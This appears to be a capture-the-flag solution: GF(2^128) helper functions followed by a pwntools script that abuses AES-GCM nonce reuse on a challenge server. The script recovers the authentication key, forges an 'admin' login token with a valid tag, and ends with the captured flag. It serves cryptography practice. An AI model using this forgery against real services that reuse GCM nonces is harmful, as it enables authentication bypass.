    for i in range(128):
37
        if (b >> i) & 1:
38
            p ^= a
39
        if (a >> 127) & 1:
40
            a = (a << 1) ^ 0xE1
41
        else:
42
            a <<= 1
43

44
    return p
45

46

47
def gf_mult(x, y):
48

49
    p = 0
50
    for i in range(128):
51
        if (y >> i) & 1:
52
            p ^= x
53
        if (x >> 127) & 1:
54
            x = (x << 1) ^ 135
55
        else:
56
            x <<= 1
57
    return p
58

59

60

61
def reverse_bits(n):
62
    # Reverse bits of 128-bit integer
63
    s = bin(n)[2:].zfill(128)
64
    return int(s[::-1], 2)
65

66

67

68
def gcm_to_poly(n):
69
    return reverse_bits(n)
70

71
def poly_to_gcm(n):
72
    return reverse_bits(n)
73

74
# Now standard arithmetic:
75
def gf_mul(a, b):
76
    p = 0
77
    mask = (1 << 128) - 1
78
    for i in range(128):
79
        if (b >> i) & 1:
80
            p ^= a
81
        if (a >> 127) & 1:
82
            a = ((a << 1) ^ 135) & mask
83
        else:
84
            a = (a << 1) & mask
85
    return p
86

87
def gf_pow(a, n):
88
    res = 1
89
    while n > 0:
90
        if n % 2 == 1:
91
            res = gf_mul(res, a)
92
        a = gf_mul(a, a)
93
        n //= 2
94
    return res
95

96
def gf_inv(a):
97
    # a^(2^128 - 2)
98
    return gf_pow(a, (1 << 128) - 2)
99

100
def gf_sqrt(a):
101
    # a^(2^127)
102
    return gf_pow(a, 1 << 127)

攻击脚本

1
from pwn import *
2
from Crypto.Util.Padding import pad
3
from gcm_util import gcm_to_poly, poly_to_gcm, gf_mul, gf_inv, gf_sqrt, bytes_to_long, long_to_bytes
4

5

6
context.log_level = 'info'
7

8
def xor_bytes(a, b):
9
    return bytes(x ^ y for x, y in zip(a, b))
10

11
def solve():
12
    r = remote("pwn-c46f6a2305.challenge.xctf.org.cn", 9999, ssl=True)
13

14
    def update_nonce(nonce_bytes):
15
        r.sendlineafter(b'>', b'U')
16
        r.sendlineafter(b'nonce(hex)>', nonce_bytes.hex().encode())
17

18
    def register():
19
        r.sendlineafter(b'>', b'R')
20
        r.recvuntil(b"Register!\n")
21
        token_hex = r.recvline().strip()
22
        username_hex = r.recvline().strip()
23
        token = bytes.fromhex(token_hex.decode())
24
        username = bytes.fromhex(username_hex.decode())
25
        return token, username
26

27
    def login(token_bytes):
28
        r.sendlineafter(b'>', b'L')
29
        r.sendlineafter(b'token(hex)>', token_bytes.hex().encode())
30
        res = r.recvline() # Login!
31
        if b"Login!" in res:
32
            try:
33
                flag = r.recvall(timeout=2)
34
                print("Flag received:")
35
                print(flag.decode())
36
            except:
37
                print("No flag or connection closed.")
38
        else:
39
            print(f"Login response: {res}")
40

41
    # Step 1: Nonce 1
42
    nonce1 = os.urandom(12)
43
    update_nonce(nonce1)
44

45
    # Register twice
46
    token1, u1 = register()
47
    c1 = token1[:16]
48
    t1 = token1[16:]
49
    p1 = pad(u1, 16)
50

51
    token2, u2 = register()
52
    c2 = token2[:16]
53
    t2 = token2[16:]
54
    p2 = pad(u2, 16)
55

56
    log.info("Got 2 pairs from nonce 1")
57

58
    # Recover H
59
    poly_t1 = gcm_to_poly(bytes_to_long(t1))
60
    poly_t2 = gcm_to_poly(bytes_to_long(t2))
61
    poly_c1 = gcm_to_poly(bytes_to_long(c1))
62
    poly_c2 = gcm_to_poly(bytes_to_long(c2))
63

64
    diff_t = poly_t1 ^ poly_t2
65
    diff_c = poly_c1 ^ poly_c2
66

67
    inv_diff_c = gf_inv(diff_c)
68
    h2 = gf_mul(diff_t, inv_diff_c)
69
    h = gf_sqrt(h2)
70

71
    log.info(f"Recovered H: {hex(poly_to_gcm(h))}")
72

73
    # Step 2: Nonce 2
74
    nonce2 = os.urandom(12)
75
    update_nonce(nonce2)
76

77
    # Register once
78
    token3, u3 = register()
79
    c3 = token3[:16]
80
    t3 = token3[16:]
81
    p3 = pad(u3, 16)
82

83
    # Forge
84
    target_p = pad(b"admin", 16)
85
    keystream = xor_bytes(c3, p3)
86
    target_c = xor_bytes(target_p, keystream)
87

88
    poly_t3 = gcm_to_poly(bytes_to_long(t3))
89
    poly_c3 = gcm_to_poly(bytes_to_long(c3))
90
    poly_target_c = gcm_to_poly(bytes_to_long(target_c))
91

92
    diff_c_new = poly_target_c ^ poly_c3
93
    delta_t = gf_mul(diff_c_new, h2)
94

95
    poly_target_t = poly_t3 ^ delta_t
96
    target_t = long_to_bytes(poly_to_gcm(poly_target_t))
97

98
    fake_token = target_c + target_t
99

100
    log.info("Forged token. Logging in...")
101
    login(fake_token)
102

103
if __name__ == "__main__":
104
    solve()
105
# flag{Dv16jo7D5Lo2Z8HJMcjBpgWe41ur6hnu}